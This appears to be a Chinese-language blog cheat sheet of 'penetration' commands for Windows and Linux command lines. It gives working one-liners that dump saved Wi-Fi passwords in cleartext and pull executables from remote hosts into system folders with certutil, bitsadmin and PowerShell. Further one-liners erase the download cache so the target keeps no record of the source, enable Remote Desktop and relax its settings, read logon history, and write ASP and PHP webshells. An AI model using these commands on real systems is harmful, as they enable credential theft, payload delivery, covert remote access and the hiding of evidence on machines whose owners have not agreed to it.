cmd渗透命令集合

cmd下获取历史wife密码

1
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

cmd下载文件

1
2
3
4
certutil -urlcache -split -f http://xxxxxxxxx/1.exe c:/windows/help/1.exe
bitsadmin /transfer n http://xxx/1.exe c:\windows\help\1.exe
powershell (new-object System.Net.WebClient).DownloadFile('http://1.1.1.1/1.exe', 'c:\Intel\1.exe')
certutil.exe -urlcache -split -f http://127.0.0.1/1.txt c:\users\test\desktop\temp.txt

但是在下载完成之后会在%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content 缓存目录中保存下载的文件副本。
可以通过certutil.exe -urlcache * 查看到,所以如不清除,便会在目标机器上留下下载地址。
清除下载缓存命令

1
certutil.exe -urlcache -f http://127.0.0.1/1.exe delete

cmd查看3389连接历史

1
powershell "& {Get-EventLog -LogName security -Newest 100 | where {$_.EventID -eq 4624} | format-list -property * | findstr "Address"}"

cmd下开启3389

win7

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

win2003

1
wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1

win2008

1
2
3
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

cmd下写webshell

win:echo ^<%eval request(“c”)%^> >>webshell.asp

linux:echo -e “<?@include(\\$_POST[“c”]);?>” > webshell.php

 

后续补充!!!

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注

16 − 7 =